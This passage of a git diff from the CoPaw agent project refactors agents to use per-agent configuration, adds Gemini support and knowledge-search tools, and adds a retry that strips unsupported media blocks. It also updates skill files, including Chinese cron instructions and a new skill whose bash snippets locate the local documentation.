compact_ratio=self._memory_compact_ratio, previous_summary=previous_summary, ) @@ -263,20 +292,37 @@ async def summary_memory(self, messages: list[Msg], **_kwargs) -> str: Returns: str: Comprehensive summary of the messages """ - config = load_config() - max_input_length = config.agents.running.max_input_length - memory_compact_ratio = config.agents.running.memory_compact_ratio - language = config.agents.language + self.prepare_model_formatter() return await super().summary_memory( messages=messages, as_llm=self.chat_model, as_llm_formatter=self.formatter, - token_counter=self.token_counter, + as_token_counter=self.token_counter, toolkit=self.summary_toolkit, - language=language, - max_input_length=max_input_length, - compact_ratio=memory_compact_ratio, + language=self._language, + max_input_length=self._max_input_length, + 
compact_ratio=self._memory_compact_ratio,
+        )
+
+    async def memory_search(
+        self,
+        query: str,
+        max_results: int = 5,
+        min_score: float = 0.1,
+    ) -> ToolResponse:
+        if not self._started:
+            async with self._start_lock:
+                if not self._started:
+                    logger.warning(
+                        "ReMe was not started; please report this on GitHub.",
+                    )
+                    await self.start()
+
+        return await super().memory_search(
+            query=query,
+            max_results=max_results,
+            min_score=min_score,
         )
 
     def get_in_memory_memory(self, **_kwargs):
@@ -288,4 +334,6 @@ def get_in_memory_memory(self, **_kwargs):
         Returns:
             The in-memory memory content with token counting support
         """
-        return super().get_in_memory_memory(token_counter=self.token_counter)
+        return super().get_in_memory_memory(
+            as_token_counter=self.token_counter,
+        )
diff --git a/src/copaw/agents/model_factory.py b/src/copaw/agents/model_factory.py
index 658e5c8f7..609b99f90 100644
--- a/src/copaw/agents/model_factory.py
+++ b/src/copaw/agents/model_factory.py
@@ -11,13 +11,10 @@
 
 import logging
-from typing import Sequence, Tuple, Type, Any
-from functools import wraps
+from typing import Optional, Sequence, Tuple, Type, Any
 
 from agentscope.formatter import FormatterBase, OpenAIChatFormatter
 from agentscope.model import ChatModelBase, OpenAIChatModel
-from agentscope.message import Msg
-import agentscope
 
 try:
     from agentscope.formatter import AnthropicChatFormatter
@@ -26,6 +23,13 @@
     AnthropicChatFormatter = None
     AnthropicChatModel = None
 
+try:
+    from agentscope.formatter import GeminiChatFormatter
+    from agentscope.model import GeminiChatModel
+except ImportError:  # pragma: no cover - compatibility fallback
+    GeminiChatFormatter = None
+    GeminiChatModel = None
+
 from .utils.tool_message_utils import _sanitize_tool_messages
 from ..providers import ProviderManager
 from ..providers.retry_chat_model import RetryChatModel
@@ -43,36 +47,6 @@ def _file_url_to_path(url: str) -> str:
     return s
-
-def _monkey_patch(func):
-    """A monkey patch wrapper for agentscope <= 1.0.16dev"""
-
- @wraps(func) - async def wrapper( - self, - msgs: list[Msg], - **kwargs: Any, - ) -> list[dict[str, Any]]: - for msg in msgs: - if isinstance(msg.content, str): - continue - if isinstance(msg.content, list): - for block in msg.content: - if ( - block["type"] in ["audio", "image", "video"] - and block.get("source", {}).get("type") == "url" - ): - url = block["source"]["url"] - if url.startswith("file://"): - block["source"]["url"] = _file_url_to_path(url) - return await func(self, msgs, **kwargs) - - return wrapper - - -if agentscope.__version__ in ["1.0.16dev", "1.0.16"]: - OpenAIChatFormatter.format = _monkey_patch(OpenAIChatFormatter.format) - - logger = logging.getLogger(__name__) @@ -82,6 +56,8 @@ async def wrapper( } if AnthropicChatModel is not None and AnthropicChatFormatter is not None: _CHAT_MODEL_FORMATTER_MAP[AnthropicChatModel] = AnthropicChatFormatter +if GeminiChatModel is not None and GeminiChatFormatter is not None: + _CHAT_MODEL_FORMATTER_MAP[GeminiChatModel] = GeminiChatFormatter def _get_formatter_for_chat_model( @@ -273,15 +249,17 @@ def _strip_top_level_message_name( return messages -def create_model_and_formatter() -> Tuple[ChatModelBase, FormatterBase]: +def create_model_and_formatter( + agent_id: Optional[str] = None, +) -> Tuple[ChatModelBase, FormatterBase]: """Factory method to create model and formatter instances. This method handles both local and remote models, selecting the appropriate chat model class and formatter based on configuration. Args: - llm_cfg: Resolved model configuration. If None, will call - get_active_llm_config() to fetch the active configuration. + agent_id: Optional agent ID to load agent-specific model config. + If None, tries to get from context, then falls back to global. 
Returns: Tuple of (model_instance, formatter_instance) @@ -289,14 +267,56 @@ def create_model_and_formatter() -> Tuple[ChatModelBase, FormatterBase]: Example: >>> model, formatter = create_model_and_formatter() """ - # Fetch config if not provided - model = ProviderManager.get_active_chat_model() + from ..app.agent_context import get_current_agent_id + from ..config.config import load_agent_config + + # Determine agent_id (parameter > context > None) + if agent_id is None: + try: + agent_id = get_current_agent_id() + except Exception: + pass + + # Try to get agent-specific model first + model_slot = None + if agent_id: + try: + agent_config = load_agent_config(agent_id) + model_slot = agent_config.active_model + except Exception: + pass + + # Create chat model from agent-specific or global config + if model_slot and model_slot.provider_id and model_slot.model: + # Use agent-specific model + manager = ProviderManager.get_instance() + provider = manager.get_provider(model_slot.provider_id) + if provider is None: + raise ValueError( + f"Provider '{model_slot.provider_id}' not found.", + ) + if provider.is_local: + from agentscope.model import create_local_chat_model + + model = create_local_chat_model( + model_id=model_slot.model, + stream=True, + generate_kwargs={"max_tokens": None}, + ) + else: + model = provider.get_chat_model_instance(model_slot.model) + provider_id = model_slot.provider_id + else: + # Fallback to global active model + model = ProviderManager.get_active_chat_model() + provider_id = ( + ProviderManager.get_instance().get_active_model().provider_id + ) # Create the formatter based on the real model class formatter = _create_formatter_instance(model.__class__) # Wrap with retry logic for transient LLM API errors - provider_id = ProviderManager.get_instance().get_active_model().provider_id wrapped_model = TokenRecordingModelWrapper(provider_id, model) wrapped_model = RetryChatModel(wrapped_model) @@ -321,7 +341,10 @@ def _create_formatter_instance( 
     formatter_class = _create_file_block_support_formatter(
         base_formatter_class,
     )
-    return formatter_class()
+    kwargs: dict[str, Any] = {}
+    if issubclass(base_formatter_class, OpenAIChatFormatter):
+        kwargs["promote_tool_result_images"] = True
+    return formatter_class(**kwargs)
 
 
 __all__ = [
diff --git a/src/copaw/agents/prompt.py b/src/copaw/agents/prompt.py
index fa17aa674..df049ad7c 100644
--- a/src/copaw/agents/prompt.py
+++ b/src/copaw/agents/prompt.py
@@ -128,16 +128,21 @@ def build(self) -> str:
         return final_prompt
 
 
-def build_system_prompt_from_working_dir() -> str:
+def build_system_prompt_from_working_dir(
+    working_dir: Path | None = None,
+    enabled_files: list[str] | None = None,
+    agent_id: str | None = None,
+) -> str:
     """
     Build system prompt by reading markdown files from working directory.
 
     This function constructs the system prompt by loading markdown files from
-    WORKING_DIR (~/.copaw by default). These files define the agent's behavior,
-    personality, and operational guidelines.
+    the specified working directory (workspace_dir for multi-agent setup).
+    These files define the agent's behavior, personality, and operational
+    guidelines.
 
-    The files to load are determined by the agents.system_prompt_files configuration.
-    If not configured, falls back to default files:
+    The files to load are determined by the enabled_files parameter or the
+    agents.system_prompt_files configuration. If not configured, falls back to
+    default files:
     - AGENTS.md - Detailed workflows, rules, and guidelines
     - SOUL.md - Core identity and behavioral principles
     - PROFILE.md - Agent identity and user profile
@@ -145,6 +150,12 @@ def build_system_prompt_from_working_dir() -> str:
     All files are optional. If a file doesn't exist or can't be read, it will
     be skipped. If no files can be loaded, returns the default prompt.
 
+    Args:
+        working_dir: Directory to read markdown files from (if None, uses
+            global WORKING_DIR for backward compatibility)
+        enabled_files: List of filenames to load (if None, uses config or
+            defaults)
+        agent_id: Agent identifier to include in system prompt (optional)
+
     Returns:
         str: Constructed system prompt from markdown files.
              If no files exist, returns the default prompt.
@@ -156,19 +167,44 @@ def build_system_prompt_from_working_dir() -> str:
     from ..constant import WORKING_DIR
     from ..config import load_config
 
-    # Load enabled files from config
-    config = load_config()
-    enabled_files = (
-        config.agents.system_prompt_files
-        if config.agents.system_prompt_files is not None
-        else None
-    )
+    # Use provided working_dir or fallback to global WORKING_DIR
+    if working_dir is None:
+        working_dir = Path(WORKING_DIR)
+
+    # Load enabled files from parameter or config
+    if enabled_files is None:
+        # Use agent-specific config if agent_id provided
+        if agent_id:
+            from ..config.config import load_agent_config
+
+            try:
+                agent_config = load_agent_config(agent_id)
+                enabled_files = agent_config.system_prompt_files
+            except (ValueError, FileNotFoundError):
+                # Agent not found in config, fallback to global config
+                config = load_config()
+                enabled_files = config.agents.system_prompt_files
+        else:
+            # Fallback to global config for backward compatibility
+            config = load_config()
+            enabled_files = config.agents.system_prompt_files
 
     builder = PromptBuilder(
-        working_dir=Path(WORKING_DIR),
+        working_dir=working_dir,
         enabled_files=enabled_files,
     )
-    return builder.build()
+    prompt = builder.build()
+
+    # Add agent identity information at the beginning of the prompt
+    if agent_id and agent_id != "default":
+        identity_header = (
+            "# Agent Identity\n\n"
+            f"Your agent id is `{agent_id}`. "
+            "This is your unique identifier in the multi-agent system.\n\n"
+        )
+        prompt = identity_header + prompt
+
+    return prompt
 
 
 def build_bootstrap_guidance(
diff --git a/src/copaw/agents/react_agent.py b/src/copaw/agents/react_agent.py
index b9b9ed2fa..13c092fe3 100644
--- a/src/copaw/agents/react_agent.py
+++ b/src/copaw/agents/react_agent.py
@@ -7,7 +7,8 @@
 import asyncio
 import logging
 import os
-from typing import Any, List, Literal, Optional, Type
+from pathlib import Path
+from typing import Any, List, Literal, Optional, Type, TYPE_CHECKING
 
 from agentscope.agent import ReActAgent
 from agentscope.mcp import HttpStatefulClient, StdIOStatefulClient
@@ -21,31 +22,38 @@
 from .hooks import BootstrapHook, MemoryCompactionHook
 from .model_factory import create_model_and_formatter
 from .prompt import build_system_prompt_from_working_dir
-from .tool_guard_mixin import ToolGuardMixin
 from .skills_manager import (
     ensure_skills_initialized,
     get_working_skills_dir,
     list_available_skills,
 )
+from .tool_guard_mixin import ToolGuardMixin
 from .tools import (
     browser_use,
     desktop_screenshot,
     edit_file,
     execute_shell_command,
+    graph_query,
     get_current_time,
     get_token_usage,
+    knowledge_search,
+    memify_run,
+    memify_status,
     read_file,
     send_file_to_user,
+    set_user_timezone,
+    triplet_focus_search,
+    view_image,
     write_file,
     create_memory_search_tool,
 )
 from .utils import process_file_and_media_blocks_in_message
 from ..agents.memory import MemoryManager
-from ..config import load_config
 from ..constant import (
-    MEMORY_COMPACT_RATIO,
     WORKING_DIR,
 )
+
+if TYPE_CHECKING:
+    from ..config.config import AgentProfileConfig
 
 logger = logging.getLogger(__name__)
@@ -75,41 +83,57 @@ class CoPawAgent(ToolGuardMixin, ReActAgent):
 
     def __init__(
         self,
+        agent_config: "AgentProfileConfig",
         env_context: Optional[str] = None,
         enable_memory_manager: bool = True,
         mcp_clients: Optional[List[Any]] = None,
-        memory_manager: MemoryManager | None = None,
+        memory_manager: "MemoryManager | None" = None,
         request_context: Optional[dict[str, str]] = None,
-        max_iters: int = 50,
-        max_input_length: int = 128 * 1024,  # 128K = 131072 tokens
         namesake_strategy: NamesakeStrategy = "skip",
+        workspace_dir: Path | None = None,
     ):
         """Initialize CoPawAgent.
 
         Args:
+            agent_config: Agent profile configuration containing all settings
+                including running config (max_iters, max_input_length,
+                memory_compact_threshold, etc.) and language setting.
             env_context: Optional environment context to prepend to system
                 prompt
             enable_memory_manager: Whether to enable memory manager
             mcp_clients: Optional list of MCP clients for tool integration
             memory_manager: Optional memory manager instance
-            max_iters: Maximum number of reasoning-acting iterations
-                (default: 50)
-            max_input_length: Maximum input length in tokens for model
-                context window (default: 128K = 131072)
+            request_context: Optional request context with session_id,
+                user_id, channel, agent_id
             namesake_strategy: Strategy to handle namesake tool functions.
                 Options: "override", "skip", "raise", "rename"
                 (default: "skip")
+            workspace_dir: Workspace directory for reading prompt files
+                (if None, uses global WORKING_DIR)
         """
+        self._agent_config = agent_config
         self._env_context = env_context
         self._request_context = dict(request_context or {})
-        self._max_input_length = max_input_length
         self._mcp_clients = mcp_clients or []
         self._namesake_strategy = namesake_strategy
+        self._workspace_dir = workspace_dir
+
+        # Extract configuration from agent_config
+        running_config = agent_config.running
+        self._max_input_length = running_config.max_input_length
+        self._language = agent_config.language
 
-        # Memory compaction threshold: configurable ratio of max_input_length
-        self._memory_compact_threshold = int(
-            max_input_length * MEMORY_COMPACT_RATIO,
+        # Memory compaction settings from config
+        self._memory_compact_threshold = (
+            running_config.memory_compact_threshold
+        )
+        self._memory_compact_reserve = running_config.memory_compact_reserve
+        self._enable_tool_result_compact = (
+            running_config.enable_tool_result_compact
+        )
+        self._tool_result_compact_keep_n = (
+            running_config.tool_result_compact_keep_n
         )
 
         # Initialize toolkit with built-in tools
@@ -132,7 +156,7 @@ def __init__(
             toolkit=toolkit,
             memory=InMemoryMemory(),
             formatter=formatter,
-            max_iters=max_iters,
+            max_iters=running_config.max_iters,
         )
 
         # Setup memory manager
@@ -148,6 +172,7 @@ def __init__(
             memory=self.memory,
             memory_manager=self.memory_manager,
             enable_memory_manager=self._enable_memory_manager,
+            agent_config=agent_config,
         )
 
         # Register hooks
@@ -169,14 +194,22 @@ def _create_toolkit(
         """
         toolkit = Toolkit()
 
-        # Load config to check which tools are enabled
-        config = load_config()
+        # Check which tools are enabled from agent config
         enabled_tools = {}
-        if hasattr(config, "tools") and hasattr(config.tools, "builtin_tools"):
-            enabled_tools = {
-                name: tool_config.enabled
-                for name, tool_config in config.tools.builtin_tools.items()
-            }
+        try:
+            if hasattr(self._agent_config, "tools") and hasattr(
+                self._agent_config.tools,
+                "builtin_tools",
+            ):
+                builtin_tools = self._agent_config.tools.builtin_tools
+                enabled_tools = {
+                    name: tool.enabled for name, tool in builtin_tools.items()
+                }
+        except Exception as e:
+            logger.warning(
+                f"Failed to load agent tools config: {e}, "
+                "falling back to default tool availability",
+            )
 
         # Map of tool functions
         tool_functions = {
             "edit_file": edit_file,
             "browser_use": browser_use,
             "desktop_screenshot": desktop_screenshot,
+            "view_image": view_image,
             "send_file_to_user": send_file_to_user,
             "get_current_time": get_current_time,
+            "set_user_timezone": set_user_timezone,
             "get_token_usage": get_token_usage,
+            "knowledge_search": knowledge_search,
+            "graph_query": graph_query,
+            "memify_run": memify_run,
+            "memify_status": memify_status,
+            "triplet_focus_search": triplet_focus_search,
         }
 
+        # Knowledge tool gating still reads the global config
+        from ..config import load_config
+
+        config = load_config()
+
         # Register only enabled tools
         for tool_name, tool_func in tool_functions.items():
+            tool_enabled = enabled_tools.get(tool_name, True)
+            if tool_name == "knowledge_search":
+                tool_enabled = (
+                    tool_enabled
+                    and bool(getattr(config.knowledge, "enabled", False))
+                    and bool(getattr(config.agents.running, "knowledge_enabled", True))
+                    and bool(
+                        getattr(
+                            config.agents.running,
+                            "knowledge_retrieval_enabled",
+                            True,
+                        )
+                    )
+                )
+            elif tool_name == "graph_query":
+                tool_enabled = (
+                    tool_enabled
+                    and bool(getattr(config.knowledge, "enabled", False))
+                    and bool(getattr(config.agents.running, "knowledge_enabled", True))
+                    and bool(getattr(config.knowledge, "graph_query_enabled", False))
+                )
+            elif tool_name in {"memify_run", "memify_status"}:
+                tool_enabled = (
+                    tool_enabled
+                    and bool(getattr(config.knowledge, "enabled", False))
+                    and bool(getattr(config.agents.running, "knowledge_enabled", True))
+                    and bool(getattr(config.knowledge, "memify_enabled", False))
+                )
+            elif tool_name == "triplet_focus_search":
+                tool_enabled = (
+                    tool_enabled
+                    and bool(getattr(config.knowledge, "enabled", False))
+                    and bool(getattr(config.agents.running, "knowledge_enabled", True))
+                    and bool(getattr(config.knowledge, "triplet_search_enabled", False))
+                )
+
             # If tool not in config, enable by default (backward compatibility)
-            if enabled_tools.get(tool_name, True):
+            if tool_enabled:
                 toolkit.register_tool_function(
                     tool_func,
                     namesake_strategy=namesake_strategy,
@@ -206,16 +282,18 @@ def _create_toolkit(
 
         return toolkit
 
     def _register_skills(self, toolkit: Toolkit) -> None:
-        """Load and register skills from working directory.
+        """Load and register skills from workspace directory.
 
         Args:
             toolkit: Toolkit to register skills to
         """
-        # Check skills initialization
-        ensure_skills_initialized()
-        working_skills_dir = get_working_skills_dir()
-        available_skills = list_available_skills()
+        # Check skills initialization
+        ensure_skills_initialized(self._workspace_dir)
+
+        working_skills_dir = get_working_skills_dir(self._workspace_dir)
+        available_skills = list_available_skills(self._workspace_dir)
 
         for skill_name in available_skills:
             skill_dir = working_skills_dir / skill_name
@@ -236,9 +314,19 @@ def _build_sys_prompt(self) -> str:
 
         Returns:
             Complete system prompt string
         """
-        sys_prompt = build_system_prompt_from_working_dir()
+        # Get agent_id from request_context
+        agent_id = (
+            self._request_context.get("agent_id")
+            if self._request_context
+            else None
+        )
+
+        sys_prompt = build_system_prompt_from_working_dir(
+            working_dir=self._workspace_dir,
+            agent_id=agent_id,
+        )
         if self._env_context is not None:
-            sys_prompt = self._env_context + "\n\n" + sys_prompt
+            sys_prompt = sys_prompt + "\n\n" + self._env_context
         return sys_prompt
 
     def _setup_memory_manager(
@@ -279,10 +367,13 @@ def _setup_memory_manager(
 
     def _register_hooks(self) -> None:
         """Register pre-reasoning and pre-acting hooks."""
         # Bootstrap hook - checks BOOTSTRAP.md on first interaction
-        config = load_config()
+        # Use workspace_dir if available, else fallback to WORKING_DIR
+        working_dir = (
+            self._workspace_dir if self._workspace_dir else WORKING_DIR
+        )
         bootstrap_hook = BootstrapHook(
-            working_dir=WORKING_DIR,
-            language=config.agents.language,
+            working_dir=working_dir,
+            language=self._language,
         )
         self.register_instance_hook(
             hook_type="pre_reasoning",
@@ -295,6 +386,7 @@ def _register_hooks(self) -> None:
         if self._enable_memory_manager and self.memory_manager is not None:
             memory_compact_hook = MemoryCompactionHook(
                 memory_manager=self.memory_manager,
+                agent_config=self._agent_config,
             )
             self.register_instance_hook(
                 hook_type="pre_reasoning",
@@ -495,6 +587,146 @@ def _rebuild_mcp_client(client: Any) -> Any | None:
         except Exception:  # pylint: disable=broad-except
             return None
 
+    # ------------------------------------------------------------------
+    # Media-block fallback: strip unsupported media blocks (image, audio,
+    # video) from memory and retry when the model rejects them.
+    # ------------------------------------------------------------------
+
+    _MEDIA_BLOCK_TYPES = {"image", "audio", "video"}
+
+    async def _reasoning(
+        self,
+        tool_choice: Literal["auto", "none", "required"] | None = None,
+    ) -> Msg:
+        """Override reasoning with media-block fallback.
+
+        If the model call fails with a bad-request error and memory
+        contains media blocks (image/audio/video), strip them all and
+        retry once. Calls ``super()._reasoning`` to keep the
+        ToolGuardMixin interception active.
+        """
+        try:
+            return await super()._reasoning(tool_choice=tool_choice)
+        except Exception as e:
+            if not self._is_bad_request_or_media_error(e):
+                raise
+
+            n_stripped = self._strip_media_blocks_from_memory()
+            if n_stripped == 0:
+                raise
+
+            logger.warning(
+                "_reasoning failed (%s). "
+                "Stripped %d media block(s) from memory, retrying.",
+                e,
+                n_stripped,
+            )
+            return await super()._reasoning(tool_choice=tool_choice)
+
+    async def _summarizing(self) -> Msg:
+        """Override summarizing with the same media-block fallback."""
+        try:
+            return await super()._summarizing()
+        except Exception as e:
+            if not self._is_bad_request_or_media_error(e):
+                raise
+
+            n_stripped = self._strip_media_blocks_from_memory()
+            if n_stripped == 0:
+                raise
+
+            logger.warning(
+                "_summarizing failed (%s). "
+                "Stripped %d media block(s) from memory, retrying.",
+                e,
+                n_stripped,
+            )
+            return await super()._summarizing()
+
+    @staticmethod
+    def _is_bad_request_or_media_error(exc: Exception) -> bool:
+        """Return True for 400-class or media-related model errors.
+
+        Targets bad-request (400) errors because unsupported media
+        content typically causes request validation failures. Keyword
+        matching provides an extra safety net for providers that use
+        non-standard status codes.
+        """
+        status = getattr(exc, "status_code", None)
+        if status == 400:
+            return True
+
+        error_str = str(exc).lower()
+        keywords = [
+            "image",
+            "audio",
+            "video",
+            "vision",
+            "multimodal",
+            "image_url",
+        ]
+        return any(kw in error_str for kw in keywords)
+
+    _MEDIA_PLACEHOLDER = (
+        "[Media content removed - model does not support this media type]"
+    )
+
+    def _strip_media_blocks_from_memory(self) -> int:
+        """Remove media blocks (image/audio/video) from all messages.
+
+        Also strips media blocks nested inside ToolResultBlock outputs.
+        Inserts placeholder text when stripping leaves content empty to
+        avoid malformed API requests.
+
+        Returns:
+            Total number of media blocks removed.
+        """
+        media_types = self._MEDIA_BLOCK_TYPES
+        total_stripped = 0
+
+        for msg, _marks in self.memory.content:
+            if not isinstance(msg.content, list):
+                continue
+
+            new_content = []
+            for block in msg.content:
+                if (
+                    isinstance(block, dict)
+                    and block.get("type") in media_types
+                ):
+                    total_stripped += 1
+                    continue
+
+                if (
+                    isinstance(block, dict)
+                    and block.get("type") == "tool_result"
+                    and isinstance(block.get("output"), list)
+                ):
+                    original_len = len(block["output"])
+                    block["output"] = [
+                        item
+                        for item in block["output"]
+                        if not (
+                            isinstance(item, dict)
+                            and item.get("type") in media_types
+                        )
+                    ]
+                    stripped_count = original_len - len(block["output"])
+                    total_stripped += stripped_count
+                    if stripped_count > 0 and not block["output"]:
+                        block["output"] = self._MEDIA_PLACEHOLDER
+
+                new_content.append(block)
+
+            if not new_content and total_stripped > 0:
+                new_content.append(
+                    {"type": "text", "text": self._MEDIA_PLACEHOLDER},
+                )
+
+            msg.content = new_content
+
+        return total_stripped
+
     async def reply(
         self,
         msg: Msg | list[Msg] | None = None,
@@ -509,6 +741,11 @@ async def reply(
         Returns:
             Response message
         """
+        # Set workspace_dir in context for tool functions
+        from ..config.context import set_current_workspace_dir
+
+        set_current_workspace_dir(self._workspace_dir)
+
         # Process file and media blocks in messages
         if msg is not None:
             await process_file_and_media_blocks_in_message(msg)
diff --git a/src/copaw/agents/skills/browser_visible/SKILL.md b/src/copaw/agents/skills/browser_visible/SKILL.md
index a38ba8db8..091b474f4 100644
--- a/src/copaw/agents/skills/browser_visible/SKILL.md
+++ b/src/copaw/agents/skills/browser_visible/SKILL.md
@@ -3,6 +3,7 @@ name: browser_visible
 description: "当用户希望打开真实可见的浏览器窗口(而非后台无头模式)时,使用 browser_use 的 headed 参数启动浏览器,随后可正常 open/snapshot/click 等。适用于用户想亲眼看到页面、演示或调试场景。"
 metadata:
   {
+    "builtin_skill_version": "1.0",
     "copaw":
       {
         "emoji": "🖥️",
diff --git a/src/copaw/agents/skills/cron/SKILL.md b/src/copaw/agents/skills/cron/SKILL.md
index 7f0a93d98..ebeea92ef 100644
--- a/src/copaw/agents/skills/cron/SKILL.md
+++ b/src/copaw/agents/skills/cron/SKILL.md
@@ -1,7 +1,7 @@
 ---
 name: cron
 description: 通过 copaw 命令管理定时任务 - 创建、查询、暂停、恢复、删除任务
-metadata: { "copaw": { "emoji": "⏰" } }
+metadata: { "builtin_skill_version": "1.0", "copaw": { "emoji": "⏰" } }
 ---
 
 # 定时任务管理
@@ -11,9 +11,12 @@ metadata: { "copaw": { "emoji": "⏰" } }
 ## 常用命令
 
 ```bash
-# 列出所有任务
+# 列出所有任务(默认操作 default agent)
 copaw cron list
 
+# 为特定 agent 列出任务
+copaw cron list --agent-id abc123
+
 # 查看任务详情
 copaw cron get <job_id>
@@ -31,6 +34,8 @@
 copaw cron resume <job_id>
 copaw cron run <job_id>
 ```
 
+**注意**:所有命令都支持 `--agent-id` 参数,默认为 `default`。如果需要操作特定 agent 的任务,请指定对应的 agent ID。
+
 ## 创建任务
 
 支持两种任务类型:
@@ -40,7 +45,7 @@
 ### 快速创建
 
 ```bash
-# 每天 9:00 发送文本消息
+# 每天 9:00 发送文本消息(默认 agent)
 copaw cron create \
   --type text \
   --name "每日早安" \
   --target-session "CHANGEME" \
   --text "早上好!"
 
-# 每 2 小时向 Agent 提问
+# 为特定 agent 创建任务
 copaw cron create \
+  --agent-id abc123 \
   --type agent \
   --name "检查待办" \
   --cron "0 */2 * * *" \
@@ -66,12 +72,16 @@ copaw cron create \
 创建任务需要:
 
 - `--type`:任务类型(text 或 agent)
 - `--name`:任务名称
-- `--cron`:cron 表达式(**UTC 时间**,如用户在 UTC+8 希望每天 9:00 执行,需填 `"0 1 * * *"`)
-- `--channel`:目标频道(imessage / discord / dingtalk / qq / console)
+- `--cron`:cron 表达式(如 `"0 9 * * *"` 表示每天 9:00)
+- `--channel`:目标频道(console / feishu / dingtalk / discord / qq / telegram / imessage / matrix / mattermost 等)。用户未指定时,使用"当前的channel"的值
 - `--target-user`:用户标识
 - `--target-session`:会话标识
 - `--text`:消息内容(text 类型)或提问内容(agent 类型)
 
+### 可选参数
+
+- `--agent-id`:指定 agent ID(默认:default)。用于多 agent 场景。
+
 ### 从 JSON 创建(复杂配置)
 
 ```bash
@@ -80,15 +90,12 @@ copaw cron create -f job_spec.json
 
 ## Cron 表达式示例
 
-> **重要:`--cron` 参数中的时间为 UTC 时间。** 用户描述的时间默认为其所在时区的本地时间,创建定时任务前必须先将其换算为 UTC 时间后再填写。
-> 例如:用户在 UTC+8 时区,说"每天早上 9:00 执行",需填写 `0 1 * * *`(UTC 01:00 = 本地 09:00)。
-
 ```
-0 9 * * *      # 每天 UTC 9:00(UTC+8 用户的 17:00,UTC-5 用户的 4:00)
-0 */2 * * *    # 每 2 小时(与时区无关)
-30 8 * * 1-5   # UTC 工作日 8:30(UTC+9 用户的 17:30)
-0 0 * * 0      # UTC 每周日零点(UTC+1 用户的周日 1:00)
-*/15 * * * *   # 每 15 分钟(与时区无关)
+0 9 * * *      # 每天 9:00
+0 */2 * * *    # 每 2 小时
+30 8 * * 1-5   # 工作日 8:30
+0 0 * * 0      # 每周日零点
+*/15 * * * *   # 每 15 分钟
 ```
 
 ## 使用建议
@@ -97,3 +104,4 @@ copaw cron create -f job_spec.json
 - 暂停/删除/恢复前,用 `copaw cron list` 查找 job_id
 - 排查问题时,用 `copaw cron state <job_id>` 查看状态
 - 给用户的命令要完整、可直接复制执行
+- 记得指定 `--agent-id` 参数
diff --git a/src/copaw/agents/skills/dingtalk_channel/SKILL.md b/src/copaw/agents/skills/dingtalk_channel/SKILL.md
index 284d3d6dc..e270e96dc 100644
--- a/src/copaw/agents/skills/dingtalk_channel/SKILL.md
+++ b/src/copaw/agents/skills/dingtalk_channel/SKILL.md
@@ -3,6 +3,7 @@ name: dingtalk_channel_connect
 description: "使用可视浏览器自动完成 CoPaw 的钉钉频道接入。适用于用户提到钉钉、DingTalk、开发者后台、Client ID、Client Secret、机器人、Stream 模式、绑定或配置 channel 的场景;支持遇到登录页时暂停,等待用户登录后继续。"
 metadata:
   {
+    "builtin_skill_version": "1.0",
     "copaw":
       {
         "emoji": "🤖",
diff --git a/src/copaw/agents/skills/docx/SKILL.md b/src/copaw/agents/skills/docx/SKILL.md
index 089822e69..26feac8b1 100644
--- a/src/copaw/agents/skills/docx/SKILL.md
+++ b/src/copaw/agents/skills/docx/SKILL.md
@@ -2,6 +2,7 @@
 name: docx
 description: "Use this skill whenever the user wants to create, read, edit, or manipulate Word documents (.docx files). Triggers include: any mention of \"Word doc\", \"word document\", \".docx\", or requests to produce professional documents with formatting like tables of contents, headings, page numbers, or letterheads. Also use when extracting or reorganizing content from .docx files, inserting or replacing images in documents, performing find-and-replace in Word files, working with tracked changes or comments, or converting content into a polished Word document. If the user asks for a \"report\", \"memo\", \"letter\", \"template\", or similar deliverable as a Word or .docx file, use this skill. Do NOT use for PDFs, spreadsheets, Google Docs, or general coding tasks unrelated to document generation."
 license: Proprietary. LICENSE.txt has complete terms
+metadata: { "builtin_skill_version": "1.0" }
 ---
 
 > **Important:** All `scripts/` paths are relative to this skill directory.
diff --git a/src/copaw/agents/skills/file_reader/SKILL.md b/src/copaw/agents/skills/file_reader/SKILL.md
index 60fd67d46..c7cca0201 100644
--- a/src/copaw/agents/skills/file_reader/SKILL.md
+++ b/src/copaw/agents/skills/file_reader/SKILL.md
@@ -3,6 +3,7 @@ name: file_reader
 description: "Read and summarize text-based file types only. Prefer read_file for text formats; use execute_shell_command for type detection when needed. PDF/Office/images/archives are handled by other skills."
 metadata:
   {
+    "builtin_skill_version": "1.0",
     "copaw":
       {
         "emoji": "📄",
diff --git a/src/copaw/agents/skills/guidance/SKILL.md b/src/copaw/agents/skills/guidance/SKILL.md
new file mode 100644
index 000000000..785610f12
--- /dev/null
+++ b/src/copaw/agents/skills/guidance/SKILL.md
@@ -0,0 +1,141 @@
+---
+name: guidance
+description: "回答用户关于 CoPaw 安装与配置的问题:优先定位并阅读本地文档,再提炼答案;若本地信息不足,兜底访问官网文档。"
+metadata:
+  {
+    "builtin_skill_version": "1.0",
+    "copaw":
+      {
+        "emoji": "🧭",
+        "requires": {}
+      }
+  }
+---
+
+# CoPaw 安装与配置问答指南
+
+当用户询问 **CoPaw 的安装、初始化、环境配置、依赖要求、常见配置项** 时,使用本 skill。
+
+核心原则:
+
+- 先查本地文档,再回答
+- 回答要基于已读到的内容,不臆测
+- 回答语言与用户提问语言保持一致
+
+## 标准流程
+
+### 第一步:定位文档位置
+
+**查找记忆中的文档目录**
+
+首先你可以查看 memory 中是否有文档目录,如果有则直接使用,如果没有则继续执行下一步。
+
+```bash
+# 获取 memory 中的文档目录
+DOC_DIR=$(find ~/.copaw/memory/ -type d -name "docs")
+```
+
+如果 memory 中没有文档目录,则继续执行下面的逻辑。
+
+**检查项目源码中的文档目录**
+
+执行以下脚本逻辑来获取变量 $COPAW_ROOT:
+
+```bash
+# 获取二进制绝对路径
+COP_PATH=$(which copaw 2>/dev/null || whereis copaw | awk '{print $2}')
+
+# 逻辑推导:如果路径包含 .copaw/bin/copaw,则根目录在其上三层
+# 例如:/path/to/CoPaw/.copaw/bin/copaw -> /path/to/CoPaw
+if [[ "$COP_PATH" == *".copaw/bin/copaw" ]]; then
+  COPAW_ROOT=$(echo "$COP_PATH" | sed 's/\/\.copaw\/bin\/copaw//')
+else
+  # 兜底:尝试获取所在目录的父目录
+  COPAW_ROOT=$(dirname $(dirname "$COP_PATH") 2>/dev/null || echo ".")
+fi
+
+echo "Detected CoPaw Root: $COPAW_ROOT"
+```
+
+验证并列出文档目录:
+使用推导出的 $COPAW_ROOT 定位文档:
+
+```bash
+# 组合标准文档路径
+DOC_DIR="$COPAW_ROOT/website/public/docs/"
+
+# 检查路径是否存在并列出文件
+if [ -d "$DOC_DIR" ]; then
